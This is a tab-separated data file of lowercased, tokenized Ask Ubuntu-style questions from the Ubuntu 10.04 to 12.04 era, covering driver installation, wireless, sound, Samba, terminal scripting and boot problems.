93842	'sudo ' not found in turnkey linux ubuntu install	just installed a turnkey linux ubuntu/apache/tomcat vm image . after some trouble getting the bridged network adapter installed on win7 , i wanted to check network access to and from the vm . verified that i could hit the vm 's web server from the host , and wanted to test that i could also hit the internet from the vm , so i did this on the shell cmd line : curl www.google.com which responded with this : -sh : curl : not found wanting to make sure it was n't busted networking , i tried this , and got the same response : curl localhost that leads me to think that was n't curl saying it ca n't find the requested url , but the shell saying it ca n't find the curl cmd . so i did this : sudo apt-get install curl response was : -sh : sudo : not found so now i 'm confused . sudo has to be installed , does n't it , and apt-get ? both because they 're fundamental i think , and because you could n't install anything else without them , if you see what i mean . is it a security issue , that my account ( which i just created via webmin ) does n't have rights to sudo ? i added myself to the secondary group 'sudo ' via webmin , though i was n't sure that was legit , logged out and back in , no change , so i undid it . i read that /etc/sudoers controls access to sudo , but as far as i can tell from both the cmd line and the webmin text editor open file dlg , it does n't exist . do i need to create it ? is it normal to have to do that , or a system defect ? or is it something else that my ignorant self is or is n't doing ?
93844	how can i change the php.ini permissions ?	i am using lamp on my computer for development only.the problem is that i can not make any changes to it because the owner in root.how could i change the permissions to it.its realy frustrating .
93848	ssh shell launched using `` expect '' does n't have full width . how can i make fix it ?	i am using expect to auto login on ssh from an unity launcher , the command looks something like this : gnome-terminal -t ssh1 -e `` expect -c 'spawn ssh root @ 111.222.333.255 ; expect assword ; send \\ '' password123\\n\\ '' ; interact ' '' that works fine for logging in automatically , but if i maximize the gnome-terminal window , the ssh shell contents remain smaller as if the window had the default size , like this : at first i thought it was because the gnome-terminal was being launched with the default size and when maximized for some reason the ssh stuff did n't resize , but then i added gnome-terminal -- window -- maximize to the command , and the same problem remains , the window starts maximized but the ssh shell text still is the size of the default terminal . also if i just open a terminal and type that command on the top , i have the same problem as if i start it from the unity launcher . any ideas what could cause this and how to fix it ?
93852	switch between 3g and 2g in zte modem	i 'm relatively new to ubuntu ( installed 11.10 just 2 days ago ) . the thing is that if i connect my zte mf691 modem via usb it shows up in connection manager . if i connect to the internet with the modem it gets connected but webpages do not load . in windows i used to set an extra initialisation for the modem to connect to my ip 's network { at+cgdcont=1 , '' ip '' , '' aircelgprs '' } . how do i set it in ubuntu ? a brief explanation or even a link would be sufficient .
93853	how to get music metadata in banshee ?	i 'm using banshee 2.2.1 on ubuntu 11.10 . when i tried to import my music library , which i made by ripping cds with windows media player , only two albums retained their information . the rest ( about 300 songs ) were dumped into the unknown artist , unknown album folder . all of them have names and some have genre information . the two albums mentioned retained everything : artist , album , names , art , etc . i am not completely sure with what i ripped these albums .
93854	how do i directing sound to a remote pulseaudio server ?	i 've configured pulseaudio server on a pc that is connected to stereo system . i 've had no problems directing audio from my notebook running ubuntu 10.10 to it - remote audio device just appeared in output device list in sound preferences . no such luck with ubuntu 11.10 on my wife 's netbook though . i 've managed to enable network access in paprefs after symlinking /usr/lib/pulse-1.0 to /usr/lib/pulse-1.0.0 , but there are no remote sound devices in sound preferences , padevchooser is removed in this release and pavucontrol does n't see any remote devices either . can this be fixed or is pulseaudio network features are indeed considered 'unneeded ' in newer ubuntu releases ? additional details : pulse_server environment variable does work , but that 's not convenient enough in this case to say the least ; avahi-browse does see the pulseaudio server , too .
93855	init error , laptop do not boot	i turned my computer on and it comes up with ways to boot and i clicked ubuntu with linux 2.6.38-13-generic . there was a recovery mode too . once i clicked its writing come up : init : udevtrigger main process ( 93 ) terminated with status 1 init : udevtrigger post stop process ( 97 ) terminated with status 1 init : udevtrigger main process ( 92 ) killed by term signal mountall : disconnected from plymouth init : plymouth-splash main processs ( 98 ) terminated with status 2 init : plymouth main process ( 50 ) killed by segv signal i have no idea what this means and my laptop do n't boot . i tried recovery mode but it comes up with similar things . i do n't know why this has happened . it can be because i tried upgrading my ubuntu to 11.0 and i shutdown the laptop before it finished ? i would be most grateful if you could help amna
93859	what is bazaar and how do i use it ?	i wanted to get a program , which is installed via bzr . i have successfully installed bzr , but it asks me to authenticate ( despite that i`m logged in to launchpad ) . bzr help seems to be oriented towards developers , and says nothing about logging in . how should a home user use it ? is there a gui ? i 'm trying to use bzr to install fb notifications for the desktop , as given here : how do i add facebook notifications to the messaging menu ?
93861	monitor all incoming pings/requests	i have installed ubuntu lucid on a vps . i installed a webserver , and also a mail server ( postfix ) . what i noticed is that some websites are continuously pinging my domain* . i have also received a number of spam mail that is delivered to my ip . what i want is an utility that record every ping or request to every port in my vps . is there something like that ? i noticed this reading my webserver log which showed that some sites were requesting resources ( images ) from some dead links on my domain
93863	how can i enable switchable graphics in my lenovo g770 laptop ?	previously i asked about the same problem in ubuntu 11.04 with messed up drivers , but now i completely reinstalled system and updated it to latest 11.10 . last time , i tried using various drivers for discrete video adapter , and thus messed up whole driver system and x server . as was proposed in answer to my previous question , i installed all anew , and of course , i did not install any drivers for any cards . ubuntu 11.10 starts okay , with integrated card on , like 11.04 did . vgaswitcheroo has the same problems , though : it switches off discrete card power okay , but does not make it work as main card ( by echoing dis to it ) . and echoing ddis to it , and then restarting x server results in black screen with some console lines in it , or in completely black screen . i did not install fglrx , ati driver or any third-party software to manipulate gpu states , because i am afraid of doing something more complicated again . so , my question is following : what else can i try to do to make the radeon work ? what software could help ? is there a way to completely switch off intel card and reinstall ubuntu this way , so it would regard radeon as single card without any hybrid modes ? thanks in advance !
93864	how do i enable mouseover window focusing ?	i am trying to enable the feature where a window becomes focused ( whether in foreground or background ) when the mouse hovers over it . in previous version of ubuntu this was changed using system > preferences > windows but that option is no longer there . how do i change this setting with the new ubuntu 11.10 ?
93869	changing the dash button to open a lens rather than shortcuts ?	i would like to change the default dash opening screen from shortcuts ( the `` home '' page ) to the applications lens . or at least to rebind the super key to achieve that effect .
93871	why ca n't wireless connection be enabled on my sony vaio e-series laptop ?	i have built in wireless ( with a switch & light on hardware for it ) it 's a sony vaio e-series with ubuntu running alongside windows 7 . the button in the menu for enable wireless is greyed out , and in the `` edit connections '' window when i click the button to make it 'on ' it turns it 'off ' immediately while the wireless button is switched on & the hardware wireless light flashes once for 3 seconds . wifi works perfectly and the light stays on ( solid ) when using windows 7 , and it works fine with wired connection on ubuntu .
93872	free space on ubuntu mount drive disappeared	i came back from vacation , inserted my ubuntu flash drive into server and fired it up , only to find out that df -h reports 0 free space . 100 % full 3.8gb drive . i installed ubuntu server on flash usb key , and i 'm pretty sure it was half empty before leaving . plus i had it unpluged during my stay out so no hacking could take place . now i wonder what happened with free space ? corrupted ? damaged ? temp files ? what is it ? ? i also found that history would n't show me any history ... on that box . weird .
93878	automatic usb boot up and persistence fil	two issues : ( 1 ) can not get ubuntu to automatically boot from memory stick ( nor am i offered a choice of os to run in bios menu ) ; 2 ) can not save changes/additions to ubuntu persistence file . working on hp desktop w/ windows 7
93882	ca n't install nvidia drivers	today i tried to install the nvidia drivers on my 11.10 ubuntu . i done everything what told on http : //www.dickscheid.net/2011/10/19-cuda-ubuntu-1110/ and http : //blog.ryant.org/2011/12/installing-cuda-toolkit-on-ubuntu-1110.html then i reboot now i see only title `` ubuntu '' and ~5 points i cant even switch to console ( ctrl alt f 1-6 ) anybody know what i can to do to save my ubuntu ?
93883	when shutting down or hibernating it just goes to the login screen	title says all . when i choose shut down or hibernate if my computer has been on a while , it just goes to the log-in screen . if i choose the shut down option there , it does nothing . it only happens if i leave it on for a while . i do not have auto login enabled . i am running 11.10 ( with all the latest updates ) . i can shut down using the terminal .
93887	nvidia not showing both video cards	im running ubuntu 11.10 . i installed the nvidia drivers version `` current version '' and they are installed correctly and currently in use - this is what the additional drivers program tells me . i go to the nvidia control program , and i find information about the video card . except that i have two video cards and there 's only one listed . when i use the command line program lshw , i can clearly see that the kernel recognizes that there are two gpu connected : id : pci:0 description : pci bridge product : nf200 pcie 2.0 switch for mainboards vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a2 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress normal_decode bus_master cap_list configuration : driver = pcieport resources : irq : 0 ioport : c000 ( size=4096 ) memory : ea000000-edffffff ioport : d0000000 ( size=268435456 ) id : display description : vga compatible controller product : g92 [ geforce 8800 gts 512 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver = nvidia latency = 0 resources : irq : 16 memory : ec000000-ecffffff memory : d0000000-dfffffff memory : ea000000-ebffffff ioport : cf00 ( size=128 ) memory : ed000000-ed01ffff id : pci:1 description : pci bridge product : nf200 pcie 2.0 switch for mainboards vendor : nvidia corporation physical id : 2 bus info : pci @ 0000:02:02.0 version : a2 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress normal_decode bus_master cap_list configuration : driver = pcieport resources : irq : 0 ioport : b000 ( size=4096 ) memory : e6000000-e9ffffff ioport : c0000000 ( size=268435456 ) id : display description : vga compatible controller product : g92 [ geforce 8800 gts 512 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver = nvidia latency = 0 resources : irq : 16 memory : e8000000-e8ffffff memory : c0000000-cfffffff memory : e6000000-e7ffffff ioport : bf00 ( size=128 ) memory : e9fe0000-e9ffffff now , why isnt the nvidia software showing information on both video cards ? thank you in advance , for your time and help . jenia edit : this is my /etc/x11/xorg.conf file section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection as you see , my xorg.conf file does not contain any information as indicated by periera . so tried to remove this above shown section and replace it with the information provided by bruno periera ; however , my visual interface stopped working on logout . i then decided instead of replacing , to append the bruno periera 's information to the information orignally contained ( show above ) in the xorg.conf file . no effect was observed . that is , the visual interface works fine , but the second card was not listed by nvidia 's control program .
93891	ubuntu one ca n't sync folders	i finally got my ubuntu one configured exactly the way that i wanted it , and now it says that there are errors with my network ; which i happen to know is not true . `` operations on this folder are disabled because there is no network connection . `` , it says in the dialogue area of nautilus in both of the folders ( documents and music ) that i use ubuntu one to synchronize . here 's some terminal voodoo that may be meaningful towards this situation : u1sdtool -- list-folders oops , an error ocurred : traceback ( most recent call last ) : failure : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.unknownmethod : method `` get_folders '' with signature `` '' on interface `` com.ubuntuone.syncdaemon.folders '' does n't exist i asked u1sdtool to list it 's folders and instead of listing my sync folders as it usually does , it displayed the above error message which is similar to the one in my ubuntu one client . i 'm desperately needing to fix this , can anybody please help me ? thanks in advance !
93893	every other time i reboot , i loose my applications lens in unity !	since upgrading to 11.10 , i have had issues with unity . it seems as though every other time i reboot , the applications lens disappears . sometimes it 's there , other times it is not . when it is not there , i obviously ca n't browse or launch applications . i have tried re-installing unity , unity-lens-applications , and unity-place-applications using apt-get install -- reinstall , but no luck . this is super frustrating . i 'd appreciate any help . thanks .
93900	where can i check what version of the linux kernel is released for 12.04 ?	well i am using a newer kernel on my ubuntu 11.10 as the stable 3.0.0-14 version was causing laggy sound on my pc . after upgrading my kernel to the latest version for the 12.04 alpha ( 3.2.0-8 ) the sound issue was solved . i upgraded by temporarily changing my sources to 12.04 ones , upgrading kernel , then switching back . i would like to know how to check which is the latest version of kernel for 12.04 so i can know when i should upgrade .
93905	no hdmi sound output on thinkpad x1	i 'm having problems getting my sound to output via hdmi to my tv . when i go to sound settings , the hdmi device does not appear . ~ $ aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : conexant analog [ conexant analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i do n't know if the video information is helpful , but anyway : ~ $ sudo lshw -c video *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : d0000000-d03fffff memory : c0000000-cfffffff ioport:5000 ( size=64 ) any suggestions for me ?
93906	ntfs drive mounted generates huge load	i 've got an ntfs drive mounted and on i/o it generates huge amounts of load . i 'm now running my cpu ( amd fusion dual core ) at 100 % ... both . my load average is 3.47 at the moment . anyone an idea to lower this load ? ( apart from using ext4 ; ) )
93908	how do i install 3d acceleration with an nvidia geforce gt520 ?	i installed play on linux , and it said 3d acceleration was n't installed so i downloaded an app called 3d acceleration but when i clicked on it it came back xdriinfo returned with non-zero exit code . i use a nvidea geforce gt 520 , i 've already installed all aditional drivers they offer . graphix card seems to be running good as far as that goes , i am new to ubuntu , and thought using the play on linux app would make my windows programs run better . each time though it says i am missing 3d acceleration , is that true or just with play on linux . i have mesa-utils installed and i also installed mesa-utils extra install , still when i click on play on linux it says there does n't seem to be 3d acceleration we sugest you install and enable it .
93909	is there a way of including firmware on a usb installation media	about a month ago i had a problem after installing ubuntu which resulted in my wireless card not working because i did n't have the required firmware on my installation media ( usb ) , if i had n't had a way to connect to a physical internet connection i pretty much would n't be able to use my internet , and find out about firmware-b43-installer which i had to install while connected to the internet . so the main question is this : is there a custom way of including this firmware ( firmware-b43-installer ) in my usb installation media , so the next time i install ubuntu the from the usb i would have the firmware installed or be able to install it without a physical internet connection .
93910	language changed to chinese , how do i change it back ?	i am using latest ubuntu . my language changed to chinese somehow . everything comes in chinese and i could n't get it back to english . tried changing in language support , but english is written in chinese which i do n't understand : ( is there a way to change back to english using terminal and not gui way ?
93916	where can i download network drivers for my bcm 4313 ?	i 'm running 10.04 desktop edition on my netbook , but it has n't automatically installed my network drivers for my broadcom device . i 'd like to find a package on the internet for it , so i can transfer it to my netbook with a usb pen drive . i do n't care if the drivers are proprietary . here is the output of lspci . 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : ati technologies inc device 9804 00:01.1 audio device : ati technologies inc wrestler hdmi audio [ radeon hd 6250/6310 ] 00:11.0 sata controller : ati technologies inc sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : ati technologies inc sbx00 smbus controller ( rev 42 ) 00:14.2 audio device : ati technologies inc sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : ati technologies inc sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : ati technologies inc sbx00 pci to pci bridge ( rev 40 ) 00:15.0 pci bridge : ati technologies inc sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:15.2 pci bridge : ati technologies inc sb900 pci to pci bridge ( pcie port 2 ) 00:15.3 pci bridge : ati technologies inc sb900 pci to pci bridge ( pcie port 3 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 06:00.0 ethernet controller : atheros communications ar8152 v2.0 fast ethernet ( rev c1 ) 07:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 )
93918	zenity and text formating	i just discovered that zenity support html tags zenity -- error -- text `` hello < b > world < /b > '' but how to make it work with `` entry '' type ? zenity -- entry -- text `` hello < b > world < /b > '' it 's printing tags instead of interpreting them
93919	go to recent directory of file using nautilus	is there any way to show recently visited file and directory in nautilus that i can quickly go to the page ( ubuntu 11.10 ) . i do n't know why ubuntu is removing it 's good features ? this features was in nautilus till ubuntu 9.10 ( maybe ) . ubuntu also replace full features control center with very less features system setting . why we are trying to be mac ? thanks in advance .
93922	installer stuck at `` configuring target system ''	it 's stuck at `` configuring target system '' it 's still stuck as of now ( i launched the installer from ubuntu after clicking `` try ubuntu '' ) how can i solve this ? should i stop it ? and will it hurt my system ? p.s : i clicked install alongside windows .
93923	where are the dconf profiles ?	the dconf system administrator guide says that `` dconf stores its profiles in text files in /etc/dconf/profile/ '' but on my 11.10 ubuntu laptop , there is no /etc/dconf directory . have profiles been deprecated or where are they now ?
93924	hotkey for placing two windows	oftentimes it is desirable to let two windows each consume exactly half of the screen . i want to do this with emacs and the terminal so that i can look up c documentation while coding . how could i make my system such that when emacs is opened from terminal , then the terminal and emacs will reposition themselves appropriately to the two halves of my screen ? or is there a better solution for my intended purpose ?
93925	extract number from a string	i have the following string device enabled ( 126 ) : 1 can i extract in a variable var only 126 and not ( 126 ) ? p.s 126 = random number please help me ! edit i paste my script so u can understand the solution id=`xinput list | grep -i touchpad | awk -f= ' { print $ 2 } ' | awk ' { print $ 1 } '` valoreenable=`xinput list-props $ id | grep -i enabled |awk ' { print $ 3 } '` valoresense=`xinput list-props $ id | grep -i profile |awk ' { print $ 3 } ' in my case valoreenable = ( 126 ) and valoresense ( 256 ) i want 126 , 256 only without ( ) : ( `
93932	can not write image to usb drive using usb-creator-gtk	when i select the disk image using the `` other '' button , it does n't appear in the list . any ideas ? i am trying to make a usb startup disk for android 3.2 from android-x86.org , the image size is 184 mb . the drive i am using is 8 gb`and appears in the list in usb-creator-gtk . any help would be greatly appreciated .
93933	timetracker app that logs programs	does anyone know of a time tracker app that logs which program you are using . so , if i 'm using libreoffice it 'll log me as working , but then when the focus switches back to chrome , it 'll log me as `` procrastinating '' thanks ! ( first question ftw ! )
93941	ubuntu 11.10 and mobility radeon hd 4570 , 512mb ca n't find working drivers	i 'm pretty new to linux and my new problem is ati drivers . when i installed ubuntu then i had black screen issue with the blinking in left upper corner , fixed it with f6 and set the `` nolapic '' mode , can boot only with `` nolapic '' . now the problem is the drivers . the suggested drivers , from the `` additional drivers '' are not working . always freeze at the login screen , the divers are : ati/amd proprietary fglrx graphics driver tried this method : http : //drivers.downloadatoz.com/tutorial/28786 , how-to-fix-amd-catalyst-11-10-not-working-on-ubuntu-11-10-issues.html ? but this method break it down really hard , not ever that helped anymore : sudo /usr/share/ati/fglrx-uninstall.sh # ( if it exists ) ; sudo apt-get remove -- purge fglrx* ; sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon ; sudo apt-get install xserver-xorg-video-ati ; sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core ; sudo dpkg-reconfigure xserver-xorg now i 'm here with a fresh install and i cant find anything that works , can someone help me please ! i like ubuntu , but i need to get rid of the lagg , or its windows 7 only for me then : ( thanks for reading !
93942	lxc containers & bridge connection	i need step by step configuration to make lxc containers in ubuntu right way to configure lxc container's right way to config cgroup right way to config network in host & in container note i have configured container 's more than 30 to 35 times , i have problem with cgroup ( mounting it in fstab ) , after restating pc computer halt after grub screen , if i dont restart it work fine my network in container 's is not working , i have did every thing i can .
93950	ca n't remap ctrl key with xmodmap	my laptop keyboard does n't have a right ctrl key . and i use a different layout than the native layout of my keyboard , so there are some keys that do nothing . so i 'm trying to remap one of those keys to use as a right control . i 'm doing the following command : xmodmap -e 'keycode 97=control_r ' . i also tried with control_l . but the key do nothing . then i tested with alt key : xmodmap -e 'keycode 97=alt_r' and it works fine . why ca n't i remap the control key ?
93951	login to account reverts to login screen , guest login ok	when i get to the login screen , i put my password , and i only get a black screen for 2 seconds , then we 're back at the login screen . when i log in to the guest account everything works perfectly . what i 've tried ; i deleted .xauthority as per instructions from elsewhere . no luck i removed 2 lines i put in .profile . no change installed gnome , but unity , unity 2d , various vers of gnome , same thing . according to other q/a 's , this could be caused by lack of disk space . i have 80 gigs free , so i would assume it 's not that if i ctrl+alt+f2 at login , i can login in to my account in the `` terminal '' with no problem . i would really appreciate any help to restore my account , and thank you very much beforehand
93953	finding a c struct or header in man pages ?	when programming in c , i like to use man sections 2 and 3 to look up the form of system and library calls . but i also often need to look up the form of a struct that is defined in a standard library . for example , sockaddr/sockaddr_un in 'sys/socket.h ' . is there any way i can look up structs or header files through man pages ?
93954	how do i get rid of windows during wubi migration ?	so i read how do i migrate to a real partition , and/or get rid of windows entirely ? , but nowhere does it tell me how i go about replacing windows entirely . is there a simpler/faster way than making two partitions , installing ubuntu on one , and then formatting the other one with windows on it ?
93955	what 's a terminal similar to iterm2 ?	my terminal choice has always been guake , but at my job they have some macs and i 've started to use iterm2 and i really love the split-functionality . so i was searching for something similar in ubuntu . i 've tried with guake + screen , but that is definitely not the same experience , because screen has to be executed as a command . yes , i could put it into my bash config , but if i split the screen i can not move the scroll bar with the mouse ( maybe there 's a shortcut for this ? ) . the other thing is that my bash config is completely screwed up with screen , i have a function to make an ls after each cd and another to show some info in my prompt when i enter a git repository . both do n't work for me . i really would like to know about a program with the iterm2 functionalities for ubuntu or , in the worst case , try to emulate them the most similar possible .
93960	problems printing certain colors on an epson stylus nx415	i 'm using ubuntu 10.04 and an epson stylus nx415 printer . i am having trouble printing the color red and brown . i just replaced all 4 ink cartridges so it 's not low on ink . it was having this problem before that . any ideas ?
93962	how often is php updated ?	i am using ubuntu 10.04 . i had installed php with the following command if that makes a difference : sudo apt-get install php5 libapache2-mod-php5 the php version on my computer is 5.3.2-1 . will php be upgraded any further on this version ? if so , where can i find out when the next upgrade will be released and what version it will be ? thanks in advance .
93967	tar -cvfz command results in error message unless i omit the hyphen before 'cvfz '	when i run the command tar -cvfz backup.tar.gz somedirectory i get the following sterr tar : exiting with failure status due to previous errors however when i omit the preceding hyphen from -cvfz everything seems to work just fine . is there a known reason for why the hyphen is preventing me from tar'ing my files ?
93968	need help with two ubuntu based system sharing in samba	i have a laptop and desktop running ubuntu and xubuntu respectively both are 64 bit 11.10 version i use xbmc on both machines to play media . i want to access my media on dekstop and play on my laptop ... . i need somthing that can enable library update [ tried upnp and i have to vereytime find the directorry ] i tried many things but on either machines the other machine wont show up on the windows network or auto detect ... manually adding the ip address opens a password dialog and i cant even access with the id and pass of that machine . please help me !
93970	how do i change firefox 's default language ?	i need to change firefox 's default language to spanish ( it 's set to english right now ) , but have been unable to find a solution so far . how can i do this ?
93971	diagnosing video lag	on my new laptop and a fresh install , using proprietary drivers , i always get video lag , when using firefox for instance , or any other gui application . though i am not sure , the problem seems to be more prevalent after a suspend/resume . restarting xorg does not help the symptom . the problem is most visible in firefox , as it is the application i use the most . running htop , when the lag occurs , i have one cpu thread working 100 % , the others at 8 % . how do i diagnose this video lag ? tried : my graphic drivers are the latest , and x is configured to work with them . disabling hw acceleration in firefox
93975	recovering ecryptfs partition with ecryptfs-recover-private not working	i am trying to reinstall , but i want to backup my encrypted home first , so i booted up from a live cd , mounted the hard drive , ran sudo ecryptfs-recover-private < home directory here > and it asked for my passphrase . i entered it , said it was successful and mounted it it in `` /tmp/ecryptfs.somethingsomething '' . i go there , using a root nautilus , and double click on the .desktop entry , and it just spawns a terminal window that instantly vanishes . i checked the readme file and it says that its running ecryptfs-mount-private , so when i run that in terminal myself , it says `` error : encrypted private directory is not setup properly '' . i 've googled around and can not find an answer , since it tells you to recover it using ecryptfs-recover-private , but that obviously is n't ' working ...
93979	unable to login after deleting the `` libxml '' package in synaptic	when i deleted the libxml in synaptic , the synaptic removed my ubuntu system and i can not login ! so i need reinstall the ubuntu system ! can you help me find a better solution than having to reinstall ubuntu ? another issue is : my benq scanner 5560 can not be detected and no backend from the sane project .
93981	users restriction ( limit on executing files )	i want to create a user in such a way that he/she can not execute any file i do n't want users to have `` x `` permissions of any file they create i m using ubuntu 11.10 update i tryed chmod 700 /bin/sh + /bin/chmod as root in this way is there any way or any possibility that users can execute files ? > can anyone provide me some step-by-step instructions please ?
93984	unable to proxy authentication credentials in kde	i want to configure proxy authentication in kde . in proxy setting there are two choices available : prompt as needed and username/password . but last one is disabled ...
93986	how can i rebrand ubuntu ?	i want to re-brand ubuntu for my college . i need to change logo and other things from ubuntu to college logo . i am going to implement ubuntu in universities and starting with my college . can anyone help me , how i can re-brand ubuntu for my college ?
93991	desktop software for maintaining codes	im finding difficulty in maintaining my code . i usually use c , php , unix script and matlab script for my development . i tried versioning my code as filename_v1 , filename_v2 etc but its very confusing and i face difficulty in the understanding which code i used some 3 days back and also facing problem to find out which version of code produced the output which im analyzing . is there any desktop software to maintain my code datewise so that i wont create multiple version of my code ? if not , can anyone guide me how people overcome this problem ?
93996	successfully installed ubuntu 11.10 , but it ca n't boot	i successfully installed the latest version of ubuntu on my laptop which has a windows xp os . i installed it from a usb drive . however when the comp told me to restart , it brought me back to windows automatically without asking me which os i wanted to boot . i 've tried reinstalling thinking it would work . i have checked the hard drive via windows and it 's clearly been partitioned . what 's wrong ? any suggestions would be appreciated .
94001	problem with display resolution using a nvidia quadro nvs 160m	after following the steps of bruno pereira 's answer in `` nvidia quadro nvs 160m in the dell latitude e6500 '' . my nvidia quadro nvs 160m driver installed on my system without any error , but after rebooting my system when i go to my system info - > graphics , driver still is `` unknown '' . my display is good in resolution 1920*1200 ( 16:10 ) but graphical objects are very small and when i change the resolution , my display goes opaque . i do n't know what should i do !
94004	sip-client which has command-line interface	is there any sip-client for ubuntu which has command-line interface ? so , for example , i can make calls without using any gui , just sending commands to the application .
94006	prevent an application from being closed on terminal exit	i have created a bash script that starts an application . since i wanted the terminal window to close when the application is started , i used this line : firefox & 2 > /dev/null ; exit ; it works fine as long as i start the script from the command line . however , if i start it from a desktop laucher the application closes as well as the terminal . can anyone explain why this is . im using ubuntu 10.10 . by only using : nohup firefox it works . but i still would like an explanation to why the original version does n't work when started from a desktop launcher , if possible .
94008	monodevelop web application not running	i 'm on ubuntu 11.10 , have installed monodevelop-2.8.5 , on the first run , it said the xsp2 server was missing , i installed that . now , the application builds successfully , but , when i run my application , it just opens google chrome ( and not my application ) . what is the problem ? the application output is , registering application : host : any port : any virtual path : / physical path : /home/tarun/mywebsite/mywebsite/ xsp2 listening on address : 127.0.0.1 root directory : /home/tarun/mywebsite/mywebsite listening on port : 8080 ( non-secure ) when i try to open , 127.0.0.1:8080 on chrome , i get the following error : oops ! google chrome could not connect to 127.0.0.1:8080 but , 127.0.0.1 works just fine .
94009	laptop speakers + additional speaker	is it possible to play sound through laptop speakers and additional speaker at the same time ? i have ubuntu 11.10 on lenovo ideapad y570 and http : //uk.jbl.com/jbl-product-detail-uk/on-tour-micro-2.html . i will appreciate a guide on how to do it , in case it is possible . thanks in advance ! best regards , pressko
94010	virtualhost serveralias does not display pictures	i added a virtual host to apache2 on my new ubuntu 11.10 serverbox . works fine for all the websites called by the plain domainname . but adding a serveralias like 'serveralias mydomain.com www.mydomain.com ' to the sites enabled virtualhost file , all the websites-pictures jpg , gif etc are not displayed in the browser calling the aliased website www.mydomain.com . clearly there is some difference between plain domainname mydomain.com and aliased domainnames like www.mydomain.com , but can not asses which directive is causing this behaviour not displaying pictures in the aliased websites . where and which apache2 directive i have to add/skip in order to display pictures in aliased websites ?
94014	why does ubuntu crash 20 times a day ?	my computer crashes many times every day , it started a few days ago . i am running 10.04 , on a two years old laptop . i am afraid my hardware is about to blow up in flames , but before buying a new computer i 'd like to hear if anybody else is experiencing something like me . when i turn on my computer it sometimes makes a beep noise and gets stuck . other times it lets me log in , then the screen gets an acid trip , and the computer is stuck . other times it lets me log in and shows the desktop , then it goes banana 's again . and finally when i have my second life viewer open , it gets stuck nearly every time i log in .
94015	i want to see if a file is opened with gedit . is it possible ?	there is a command-line option to see what files are open with gedit ? if i open two files in gedit ( file1 and file2 ) and in terminal i use the command : ps ax | grep-v grep | grep gedit i get only the first file opened . ( 5944 pts/0 s+ 0:01 gedit /home/file1 ) using this command i do not see that file2 is also open in gedit . it is another way ?
94020	why does video tear on a radeon mobility 7500 ?	i have an ibm thinkpad t42 , with a radeon mobility 7500 graphics chipset . on all versions of ubuntu that i have tried ( natty , xubuntu 11.10 ) , playing any video ( e.g a dvd in vlc ) causes tearing , whether full screen or not . furthermore , playing videos under a composited desktop ( e.g . metacity or xfwm compositing ) results in very poor framerate .
94021	how do i get the broadcom bcm4313 wireless working on an asus 1015px ?	i installed ubuntu 11.10 on my asus 1015px which is certified by canonical . my wifi is not working . i read about the bcm4313 troubles and tried https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx http : //www.broadcom.com/support/802.11/linux_sta.php i already tried everything in the thread broadcom bcm4313 working , but terribly slow but nothing worked for me . and others but nothing helped . can anyone give a detailed description point-by-point what he did to get this thing working on an asus 1015px ?
94024	how to do the windows equivalent of `` format c : '' ?	bought a second hand laptop with no os . installed ubuntu and have been running it now for about a year without any problems . now need to use more windows applications ( childrens educational applications that just wo n't run in ubuntu ) . i already have a spare copy and licence codes for xp and would like to do either of the following : completely wipe/erase ubuntu from the laptop , then install xp , and then run ubuntu with dual boot . ( the only thing we do with this laptop is browse the internet . we have no data saved to the hard drive so we do n't even need a backup ) create a new partition and install xp with ubuntu ( this seems like a very troublesome option ) .
